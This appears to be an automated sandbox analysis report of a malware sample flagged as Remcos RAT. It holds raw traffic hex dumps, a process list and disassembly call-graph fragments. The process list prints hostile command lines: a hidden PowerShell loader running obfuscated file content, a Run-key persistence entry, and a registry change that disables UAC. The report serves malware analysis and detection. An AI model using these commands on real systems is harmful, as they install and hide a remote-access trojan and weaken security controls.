2024-09-02 14:20:44 UTC | 4860 | IN | Data Raw: 11 dc 07 de ea 0e 95 c5 31 21 b1 63 0d cc cb 19 b6 d9 51 d2 7a a5 c0 3a 67 f4 62 57 86 e6 2f a5 ef 4d c6 a1 9e 1a 06 9c d1 fb f6 d7 56 a2 5b 6a 90 d3 15 4b af 98 71 a3 40 73 7a 39 93 c7 02 53 12 19 6a d1 35 34 28 be 13 dc 02 6f e2 5b 43 e8 81 6b 95 7d 5f 5e 6a 48 da 6b ea f8 0a 2d a7 fe 55 33 8f 05 ee 7a 53 f4 fd 32 42 b3 ab 77 be 24 52 78 fe 94 4b a2 06 ac ce 33 e4 7b dc 73 af 75 77 2a d8 94 05 3a 72 dc e5 19 89 0b fb de 66 61 1c 9c 3c c8 56 e9 24 2a 76 e9 eb 24 e9 3a 85 c3 c7 f7 1d e7 31 0c b2 72 83 b3 eb aa 4b b6 f8 45 d8 e2 be fb 75 d2 0f fb f5 53 04 9d 66 9c 91 4f c8 cf a7 c1 e5 3c 6d 50 72 fe c2 b7 8e af b6 85 c3 69 3c 44 35 5e 2c ae 52 7a 4f 98 ba 4b e3 c1 43 2a 0b 82 24 4b 69 35 e3 cb e1 42 e7 77 80 bc 19 69 bb b6 d4 cc 59 66 7d 95 67 e4 bc 4f 31
                                    Data Ascii: 1!cQz:gbW/MV[jKq@sz9Sj54(o[Ck}_^jHk-U3zS2Bw$RxK3{suw*:rfa<V$*v$:1rKEuSfO<mPri<D5^,RzOKC*$Ki5BwiYf}gO1
2024-09-02 14:20:44 UTC | 120 | IN | Data Raw: fc 5e 33 ae d3 0f a2 f5 53 05 9d 5d 65 6e b0 a8 37 75 df 7e 89 bd df 62 16 55 3d 7f 47 6c 0a 8e 79 be f9 5e 5e a7 30 37 86 45 c8 37 8d 29 77 1e 41 0b 7d 00 e2 24 21 ce 01 b1 aa 2b 82 7f aa df e6 f6 be 56 ba 32 66 82 b1 c8 26 bc d4 36 0a aa af fe 40 0e 32 c6 0a 6a 1c e6 31 c7 a2 67 41 8c 9d 97 16 3b a7 e9 74 e4 56 88 d8 b5 af 89 a6 ff 0f 05 ba 4b 16 17 36 ae
                                    Data Ascii: ^3S]en7u~bU=Gly^^07E7)wA}$!+V2f&6@2j1gA;tVK6
2024-09-02 14:20:44 UTC | 1323 | IN | Data Raw: 23 1c 46 2f 3c 99 70 14 ed f3 ca a0 53 09 ab 12 9d fa c6 bc fa 58 91 a6 03 6b f5 47 c0 a8 b6 a2 62 a1 ae 46 e1 51 ef 4e 97 b1 9f 9b 2a a7 a1 6c f7 ea 98 00 40 a0 1e 42 7b 64 4c f5 eb 9b 43 06 a2 22 44 71 c2 61 4a 8f e4 ce 7d a8 8a 94 b6 cd a4 0f 4e cc d5 bc e1 39 09 38 76 27 75 8f 6d ee 07 61 74 83 a5 c6 85 f8 64 94 d0 42 e8 8a c7 6d 38 9d af 4c 2a a6 44 55 63 3f 0a 0a 23 2e 0c 95 a0 ac de 42 59 5f a5 05 1c 3c 59 0b 1c 37 32 14 f1 7c ad 5b 60 2b 05 b2 20 d9 97 ae 7e b0 8b de 7c 77 5d 92 87 cc 67 66 12 e5 a1 0e ee 51 bb f1 13 9c a1 40 1f 7c 37 dd 48 d9 45 ce 7d 0b 77 71 59 17 c6 6c 50 80 fa 8a 57 5e c4 9c cf 6f a9 08 a6 61 21 8d c7 67 95 19 39 3f 58 59 48 9b 0f 07 a8 06 4b 65 1e f6 33 bc 79 64 09 63 89 10 c6 d9 7f 3f 1b 48 7d 28 16 71 65 ac 81 0e 25 ba 41
                                    Data Ascii: #F/<pSXkGbFQN*l@B{dLC"DqaJ}N98v'umatdBm8L*DUc?#.BY_<Y72|[`+ ~|w]gfQ@|7HE}wqYlPW^oa!g9?XYHKe3ydc?H}(qe%A
2024-09-02 14:20:44 UTC | 1390 | IN | Data Raw: c4 e7 e3 74 bb 1f 1d 82 f2 ae ed 28 72 fa a8 8a 03 c6 21 14 d7 68 90 24 81 a0 a1 dd 39 49 0c 75 fe 69 32 5d 56 21 41 7a 75 62 c8 8a 1e 68 cc 21 c8 8c 57 35 64 10 d4 3b 8e bc 73 dd 27 8a 0b 16 ae e7 b9 f0 1b d0 3b d8 94 77 a6 dd db 18 7a fb a6 85 09 9e 8b 1c ff 8a 23 d8 03 50 25 fe e7 ed af 16 ad 3d 8d 46 1d e2 e7 04 42 7e 4e e3 b3 41 64 b4 49 25 6a db 3a 3a ff 7c 59 62 a2 8e 37 c8 9e 59 44 e4 4b c6 f7 8c c1 04 d9 65 19 b8 16 6e cc 80 b8 b8 47 b7 24 6d bf 2c 76 58 14 9e e3 c6 56 52 85 cf 60 7f 43 4f 59 48 e4 af de 82 9f 09 75 cf 8c 7f 56 cb 4f a7 b5 7d 63 db 6d 5c 1e bc 6b 90 70 64 f5 de 00 18 95 4b 3f 87 22 85 e3 8f 8a 89 be c8 dd 76 50 39 01 7f 61 e5 ff e8 0b 60 94 bb 24 52 f1 ff 38 b0 95 f3 2b f8 6f 75 12 80 37 d3 48 a8 54 9a b8 a4 a0 fe 1a fc 43 54 92
                                    Data Ascii: t(r!h$9Iui2]V!Azubh!W5d;s';wz#P%=FB~NAdI%j::|Yb7YDKenG$m,vXVR`COYHuVO}cm\kpdK?"vP9a`$R8+ou7HTCT
2024-09-02 14:20:44 UTC | 1390 | IN | Data Raw: 6f 4e ff 93 0c a9 bc d0 dc e7 99 dd 6b c1 7c d8 29 6b d0 c8 ab 3b 51 ae d8 78 b3 a7 57 58 5b c6 b9 84 8d a3 b7 0a 2d 1a 94 b7 4b 82 6a e2 7d 89 a9 a2 10 d0 b3 a9 64 d7 1b 9a c1 01 d9 4d 97 e4 c7 f8 63 71 04 c0 aa 9c bc 05 74 e3 b3 16 f4 13 ac 3d 64 14 27 ad 1d 64 a5 01 dd 59 cb 81 99 8c 3d e6 b0 13 ec c1 01 68 46 39 3f a4 eb ed fa 52 18 68 73 ef 01 48 1c 0b 32 6f e9 63 99 39 34 e6 ec 95 9c f9 43 4f 13 e2 1b 0b d1 10 c7 91 1e 7d c1 2e 6f aa 05 18 47 b8 f5 f8 35 a3 c5 fa 18 de 24 fe ef b4 e9 95 d4 36 a4 64 ec 38 d7 e3 4c d8 b6 49 6a 34 a3 c8 d7 71 3d ad e9 f1 3a ce bc 01 44 8f 5e b0 a0 2a 8d 09 b9 37 5f 54 7e 73 68 22 10 c9 71 ae 72 84 dd 0b 68 30 6d 97 6b 27 56 d5 41 6f e0 15 8f ae dd e9 fe af 19 61 34 ff 1b 62 8b 38 9c b0 78 e8 38 1f 52 6e 37 f8 5a 29 12
                                    Data Ascii: oNk|)k;QxWX[-Kj}dMcqt=d'dY=hF9?RhsH2oc94CO}.oG5$6d8LIj4q=:D^*7_T~sh"qrh0mk'VAoa4b8x8Rn7Z)
                                    2024-09-02 14:20:44 UTC1390INData Raw: eb d3 06 6c be cc 8c dc 3c 20 68 6b 1d 88 5d de 9d c9 0b 39 cd 16 c5 ba bd bd 1f c9 46 6c 1e a7 da 70 f7 59 13 fa ed ba fe 9f 57 4a 59 fa 51 18 14 d6 d4 9c 64 0d e4 fa 27 25 cd b1 4f cc 4d 9b c2 56 16 1b 69 36 56 f0 d9 a0 91 f5 3f b2 a3 40 ed 04 f1 b6 1d 63 9e 42 d0 83 15 fb ec 1a d7 7d b1 df 76 6a b7 1c 2b 0f 3c 79 90 63 e9 2a de a6 31 ef 11 0d 76 a1 30 0e 28 88 51 44 9a a5 6d d3 cc 69 4c b8 f8 f2 f8 c1 8d e5 df 92 dd f4 0e c5 68 36 0f 2d 95 1e 1e 87 ef 22 53 94 35 c1 2e 4b 4a 5d 1e 31 fc 30 36 9d d7 f6 fb 32 a3 8b 9d e7 f3 09 c7 72 c1 12 06 e0 8e be bb 86 71 5b 13 34 15 6c 89 23 87 e6 32 57 67 09 88 a5 48 ca ae 01 f5 2e dd 1c bc 4a 6a 8e 1d 82 52 6e 48 d8 a2 93 21 b5 0e 56 0a ea 69 c3 c6 4c ef 8b 82 26 b8 29 84 ad 51 a6 71 43 08 6f f1 c8 bc 14 be 73 03
                                    Data Ascii: l< hk]9FlpYWJYQd'%OMVi6V?@cB}vj+<yc*1v0(QDmiLh6-"S5.KJ]1062rq[4l#2WgH.JjRnH!ViL&)QqCos
                                    2024-09-02 14:20:44 UTC1390INData Raw: 62 56 7d 88 f5 e0 e9 39 82 22 14 2f 10 f1 e1 bb f0 a1 fb 7e ae dd 55 9b 7e 47 49 3c c3 57 32 c1 19 c2 9d aa b2 a1 b6 86 e9 8e ba 09 b6 be 41 b0 3a 38 ab bc df ab 9f ee e8 45 06 fd 41 02 f0 ef 7d c6 c6 4d 1c 05 a1 6c 49 d3 d7 fe 5a 0d ae 65 89 3f 73 cf c3 3a 43 b3 87 74 49 bf ab 23 54 b2 c7 f3 f7 52 d7 13 1f e5 ad 0a 37 b2 65 de ec aa 11 70 27 f8 51 69 d4 ce a1 1f 38 16 c7 27 cb 9f 50 9b ff e5 42 bc af 12 b6 7d 60 9d 87 f2 40 83 55 fc 2c aa 8b 5a 06 61 69 4f 1e e4 9e 74 36 3d ed 1d 5b 1a c0 fe c6 59 42 e6 d3 59 df f9 2f 5f d3 38 34 4e 66 6c e8 8f 77 43 3c b6 e3 c9 fe 2c da f3 14 a3 98 5e 13 00 dd 36 0a 84 ef 44 3b 5b fa e6 59 01 e8 92 f1 8f 7e 40 91 0f 11 b1 81 62 d3 21 ef a2 e0 4c b3 4c a8 e5 66 3f 22 ac e4 1f 05 2e cb 95 6e c0 1c 5d 96 09 34 8a 5f 9e 80
                                    Data Ascii: bV}9"/~U~GI<W2A:8EA}MlIZe?s:CtI#TR7ep'Qi8'PB}`@U,ZaiOt6=[YBY/_84NflwC<,^6D;[Y~@b!LLf?".n]4_
                                    2024-09-02 14:20:44 UTC1390INData Raw: 46 0d 55 2b 3e e0 04 32 b2 84 88 6e 5f e0 b2 2e 48 61 89 ff 99 c9 f3 bd 42 27 cc dc 0f 52 d1 cd c6 65 f4 9d 0a f9 3e 90 31 41 cf e8 08 d7 dd 4b df 6f d8 b8 c0 c8 2c 6f 67 1e c2 8c 02 01 c7 38 ee d7 54 f7 da 19 cd 91 33 ef 0d 4d 96 09 9e f9 38 08 b0 2b c7 07 16 1b 7e 33 1f fa 82 bf 5a ec 7a 42 0b 93 35 c1 09 b3 b6 62 b0 eb 68 11 40 dd d9 74 e0 5f a4 e3 1e b6 3a cb 1c 92 b0 5e ca 70 91 14 05 cc 33 b3 78 ac fc 03 ff 70 7a ce e9 fc 6f fd 55 9e 69 49 94 fe a8 9d 55 3c fb b8 55 83 16 12 89 e2 fc 0f b5 0f 72 cb 58 6b 5f a8 8f 80 b0 b9 ea 3e c5 8a 0b ea 84 be 97 0f b5 2d d1 05 ec b1 58 c4 33 92 52 0f 68 f2 c0 8a de c4 43 b5 f5 4f f4 4e 5a 29 4d 2a 3e a3 1c 83 c7 13 80 c8 bc 8a bc fb a2 00 7d 0d 3a 47 7e ac d1 91 1e 2c 12 3d 45 da 2d 52 b5 da ab dc 2d 0c 6a 49 00
                                    Data Ascii: FU+>2n_.HaB'Re>1AKo,og8T3M8+~3ZzB5bh@t_:^p3xpzoUiIU<UrXk_>-X3RhCONZ)M*>}:G~,=E-R-jI
                                    2024-09-02 14:20:44 UTC1390INData Raw: ea 28 8a 5b 9b 68 98 b8 3f c8 7c 43 60 01 18 83 25 f4 9d bc bb 97 a8 54 f9 62 aa 2a 50 a9 3c e8 06 7d b5 84 a1 63 b9 b9 25 44 bc 4f 06 06 f4 bc 87 3c 89 27 2e 4d 38 b9 5b d4 bb 22 9f 64 c6 05 d3 2c 04 e2 99 7c 6a 7f d5 76 3a 89 1c 7b 9c 0f 13 b7 8e e0 e3 9b 66 c8 b0 04 39 7c c6 0d 66 c6 54 86 15 93 e1 57 ad 8a f7 a9 fb 4c 2c 67 84 4c ae 63 8f ff e0 3f c4 aa c4 3f 65 2d 60 3c 6b 1f 88 ae f1 dc f8 60 4f 2a 73 13 30 8c 3f e2 34 4f 15 27 88 d7 72 f8 a2 5c 56 1c 85 35 cf 6f 86 36 e6 c4 fa cd 56 e7 3b dc 17 ec f1 61 44 65 3c 06 bc b7 e9 99 e7 0e 94 94 fe fe d0 a3 c5 d5 cb 30 aa 64 49 75 51 d5 03 2f b8 cc 16 42 be 04 6c f6 e9 b5 5b b3 a3 d0 63 d3 d0 0e 84 38 0c 90 21 6f 54 5d 97 13 10 7a 92 8c da 24 89 35 fa df 2c 47 04 62 6f 33 9e df b2 69 a8 28 d5 2c 6c 99 f1
                                    Data Ascii: ([h?|C`%Tb*P<}c%DO<'.M8["d,|jv:{f9|fTWL,gLc??e-`<k`O*s0?4O'r\V5o6V;aDe<0dIuQ/Bl[c8!oT]z$5,Gbo3i(,l


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:10:19:43
                                    Start date:02/09/2024
                                    Path:C:\Users\user\Desktop\anziOUzZJs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\anziOUzZJs.exe"
                                    Imagebase:0x400000
                                    File size:469'904 bytes
                                    MD5 hash:61BDBE7854F1572202F7916CF7F03616
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:10
                                    Start time:10:19:47
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
                                    Imagebase:0x940000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:10:19:47
                                    Start date:02/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:18
                                    Start time:11:34:01
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
                                    Imagebase:0x410000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:19
                                    Start time:11:34:01
                                    Start date:02/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:20
                                    Start time:11:34:01
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\reg.exe
                                    Wow64 process (32bit):true
                                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
                                    Imagebase:0xea0000
                                    File size:59'392 bytes
                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:22
                                    Start time:11:34:09
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                    Imagebase:0x410000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:23
                                    Start time:11:34:09
                                    Start date:02/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:24
                                    Start time:11:34:09
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\reg.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                    Imagebase:0xea0000
                                    File size:59'392 bytes
                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:26
                                    Start time:11:34:09
                                    Start date:02/09/2024
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Imagebase:0x7ff7b4ee0000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:33
                                    Start time:11:34:12
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 3448
                                    Imagebase:0x380000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:35
                                    Start time:11:34:17
                                    Start date:02/09/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 2384
                                    Imagebase:0x380000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                      Execution Graph

                                      Execution Coverage:21.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:23.2%
                                      Total number of Nodes:1287
                                      Total number of Limit Nodes:39
4066->4071 4068 406092 5 API calls 4067->4068 4069 401f37 4068->4069 4070 406092 5 API calls 4069->4070 4072 401f41 4070->4072 4072->4071 4076 405c57 wsprintfA 4072->4076 4074 401f78 4077 405c57 wsprintfA 4074->4077 4076->4074 4077->4071 4078 4014f0 SetForegroundWindow 4079 4028cf 4078->4079 4080 403ff2 lstrcpynA lstrlenA 4086 4018f5 4087 40192c 4086->4087 4088 402a3a 18 API calls 4087->4088 4089 401931 4088->4089 4090 40559b 69 API calls 4089->4090 4091 40193a 4090->4091 4092 4024f7 4093 402a3a 18 API calls 4092->4093 4094 4024fe 4093->4094 4097 40596c GetFileAttributesA CreateFileA 4094->4097 4096 40250a 4097->4096 4098 4018f8 4099 402a3a 18 API calls 4098->4099 4100 4018ff 4099->4100 4101 4054ef MessageBoxIndirectA 4100->4101 4102 401908 4101->4102 4117 4014fe 4118 401506 4117->4118 4120 401519 4117->4120 4119 402a1d 18 API calls 4118->4119 4119->4120 4121 402b7f 4122 402b8e SetTimer 4121->4122 4125 402ba7 4121->4125 4122->4125 4123 402bfc 4124 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4124->4123 4125->4123 4125->4124 4126 401000 4127 401037 BeginPaint GetClientRect 4126->4127 4128 40100c DefWindowProcA 4126->4128 4130 4010f3 4127->4130 4131 401179 4128->4131 4132 401073 CreateBrushIndirect FillRect DeleteObject 4130->4132 4133 4010fc 4130->4133 4132->4130 4134 401102 CreateFontIndirectA 4133->4134 4135 401167 EndPaint 4133->4135 4134->4135 4136 401112 6 API calls 4134->4136 4135->4131 4136->4135 4144 401b02 4145 402a3a 18 API calls 4144->4145 4146 401b09 4145->4146 4147 402a1d 18 API calls 4146->4147 4148 401b12 wsprintfA 4147->4148 4149 4028cf 4148->4149 4150 402482 4151 402b44 19 API calls 4150->4151 4152 40248c 4151->4152 4153 402a1d 18 API calls 4152->4153 4154 402495 4153->4154 4155 4024b8 RegEnumValueA 4154->4155 4156 4024ac RegEnumKeyA 4154->4156 4158 4026a6 4154->4158 4157 4024d1 RegCloseKey 4155->4157 4155->4158 4156->4157 4157->4158 4160 401a03 4161 402a3a 18 API calls 4160->4161 4162 401a0c ExpandEnvironmentStringsA 4161->4162 4163 
401a20 4162->4163 4165 401a33 4162->4165 4164 401a25 lstrcmpA 4163->4164 4163->4165 4164->4165 4166 402283 4167 40228b 4166->4167 4169 402291 4166->4169 4168 402a3a 18 API calls 4167->4168 4168->4169 4170 402a3a 18 API calls 4169->4170 4172 4022a1 4169->4172 4170->4172 4171 4022af 4173 402a3a 18 API calls 4171->4173 4172->4171 4174 402a3a 18 API calls 4172->4174 4175 4022b8 WritePrivateProfileStringA 4173->4175 4174->4171 4176 404e86 4177 404e96 4176->4177 4178 404eaa 4176->4178 4179 404e9c 4177->4179 4188 404ef3 4177->4188 4180 404eb2 IsWindowVisible 4178->4180 4184 404ec9 4178->4184 4182 403f2a SendMessageA 4179->4182 4183 404ebf 4180->4183 4180->4188 4181 404ef8 CallWindowProcA 4185 404ea6 4181->4185 4182->4185 4189 4047dd SendMessageA 4183->4189 4184->4181 4194 40485d 4184->4194 4188->4181 4190 404800 GetMessagePos ScreenToClient SendMessageA 4189->4190 4191 40483c SendMessageA 4189->4191 4192 404834 4190->4192 4193 404839 4190->4193 4191->4192 4192->4184 4193->4191 4203 405cf9 lstrcpynA 4194->4203 4196 404870 4204 405c57 wsprintfA 4196->4204 4198 40487a 4199 40140b 2 API calls 4198->4199 4200 404883 4199->4200 4205 405cf9 lstrcpynA 4200->4205 4202 40488a 4202->4188 4203->4196 4204->4198 4205->4202 3093 402308 3094 402338 3093->3094 3095 40230d 3093->3095 3097 402a3a 18 API calls 3094->3097 3106 402b44 3095->3106 3099 40233f 3097->3099 3098 402314 3100 40231e 3098->3100 3104 402357 3098->3104 3110 402a7a RegOpenKeyExA 3099->3110 3101 402a3a 18 API calls 3100->3101 3102 402325 RegDeleteValueA RegCloseKey 3101->3102 3102->3104 3107 402a3a 18 API calls 3106->3107 3108 402b5d 3107->3108 3109 402b6b RegOpenKeyExA 3108->3109 3109->3098 3117 402aa5 3110->3117 3119 402355 3110->3119 3111 402acb RegEnumKeyA 3112 402add RegCloseKey 3111->3112 3111->3117 3120 406092 GetModuleHandleA 3112->3120 3114 402b02 RegCloseKey 3114->3119 3115 402a7a 5 API calls 3115->3117 3117->3111 3117->3112 3117->3114 3117->3115 3118 402b1d RegDeleteKeyA 3118->3119 3119->3104 3121 4060b8 
GetProcAddress 3120->3121 3122 4060ae 3120->3122 3124 402aed 3121->3124 3126 406024 GetSystemDirectoryA 3122->3126 3124->3118 3124->3119 3125 4060b4 3125->3121 3125->3124 3127 406046 wsprintfA LoadLibraryExA 3126->3127 3127->3125 4206 402688 4207 402a3a 18 API calls 4206->4207 4208 40268f FindFirstFileA 4207->4208 4209 4026b2 4208->4209 4212 4026a2 4208->4212 4210 4026b9 4209->4210 4214 405c57 wsprintfA 4209->4214 4215 405cf9 lstrcpynA 4210->4215 4214->4210 4215->4212 4216 401c8a 4217 402a1d 18 API calls 4216->4217 4218 401c90 IsWindow 4217->4218 4219 4019f3 4218->4219 3262 403a0b 3263 403a23 3262->3263 3264 403b5e 3262->3264 3263->3264 3265 403a2f 3263->3265 3266 403b6f GetDlgItem GetDlgItem 3264->3266 3281 403baf 3264->3281 3267 403a3a SetWindowPos 3265->3267 3268 403a4d 3265->3268 3269 403ede 19 API calls 3266->3269 3267->3268 3271 403a52 ShowWindow 3268->3271 3272 403a6a 3268->3272 3273 403b99 SetClassLongA 3269->3273 3271->3272 3276 403a72 DestroyWindow 3272->3276 3277 403a8c 3272->3277 3278 40140b 2 API calls 3273->3278 3274 403c09 3275 403b59 3274->3275 3332 403f2a 3274->3332 3280 403e67 3276->3280 3282 403a91 SetWindowLongA 3277->3282 3283 403aa2 3277->3283 3278->3281 3279 401389 2 API calls 3284 403be1 3279->3284 3280->3275 3291 403e98 ShowWindow 3280->3291 3281->3274 3281->3279 3282->3275 3287 403b4b 3283->3287 3288 403aae GetDlgItem 3283->3288 3284->3274 3289 403be5 SendMessageA 3284->3289 3285 40140b 2 API calls 3302 403c1b 3285->3302 3286 403e69 DestroyWindow EndDialog 3286->3280 3351 403f45 3287->3351 3292 403ac1 SendMessageA IsWindowEnabled 3288->3292 3293 403ade 3288->3293 3289->3275 3291->3275 3292->3275 3292->3293 3295 403aeb 3293->3295 3296 403b32 SendMessageA 3293->3296 3297 403afe 3293->3297 3306 403ae3 3293->3306 3294 405d1b 18 API calls 3294->3302 3295->3296 3295->3306 3296->3287 3299 403b06 3297->3299 3300 403b1b 3297->3300 3345 40140b 3299->3345 3304 40140b 2 API calls 3300->3304 3301 403b19 3301->3287 3302->3275 3302->3285 3302->3286 
3302->3294 3305 403ede 19 API calls 3302->3305 3323 403da9 DestroyWindow 3302->3323 3335 403ede 3302->3335 3307 403b22 3304->3307 3305->3302 3348 403eb7 3306->3348 3307->3287 3307->3306 3309 403c96 GetDlgItem 3310 403cb3 ShowWindow KiUserCallbackDispatcher 3309->3310 3311 403cab 3309->3311 3338 403f00 KiUserCallbackDispatcher 3310->3338 3311->3310 3313 403cdd EnableWindow 3316 403cf1 3313->3316 3314 403cf6 GetSystemMenu EnableMenuItem SendMessageA 3315 403d26 SendMessageA 3314->3315 3314->3316 3315->3316 3316->3314 3339 403f13 SendMessageA 3316->3339 3340 405cf9 lstrcpynA 3316->3340 3319 403d54 lstrlenA 3320 405d1b 18 API calls 3319->3320 3321 403d65 SetWindowTextA 3320->3321 3341 401389 3321->3341 3323->3280 3324 403dc3 CreateDialogParamA 3323->3324 3324->3280 3325 403df6 3324->3325 3326 403ede 19 API calls 3325->3326 3327 403e01 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3326->3327 3328 401389 2 API calls 3327->3328 3329 403e47 3328->3329 3329->3275 3330 403e4f ShowWindow 3329->3330 3331 403f2a SendMessageA 3330->3331 3331->3280 3333 403f42 3332->3333 3334 403f33 SendMessageA 3332->3334 3333->3302 3334->3333 3336 405d1b 18 API calls 3335->3336 3337 403ee9 SetDlgItemTextA 3336->3337 3337->3309 3338->3313 3339->3316 3340->3319 3343 401390 3341->3343 3342 4013fe 3342->3302 3343->3342 3344 4013cb MulDiv SendMessageA 3343->3344 3344->3343 3346 401389 2 API calls 3345->3346 3347 401420 3346->3347 3347->3306 3349 403ec4 SendMessageA 3348->3349 3350 403ebe 3348->3350 3349->3301 3350->3349 3352 403f5d GetWindowLongA 3351->3352 3362 403fe6 3351->3362 3353 403f6e 3352->3353 3352->3362 3354 403f80 3353->3354 3355 403f7d GetSysColor 3353->3355 3356 403f90 SetBkMode 3354->3356 3357 403f86 SetTextColor 3354->3357 3355->3354 3358 403fa8 GetSysColor 3356->3358 3359 403fae 3356->3359 3357->3356 3358->3359 3360 403fb5 SetBkColor 3359->3360 3361 403fbf 3359->3361 3360->3361 3361->3362 3363 403fd2 DeleteObject 3361->3363 3364 403fd9 CreateBrushIndirect 3361->3364 3362->3275 
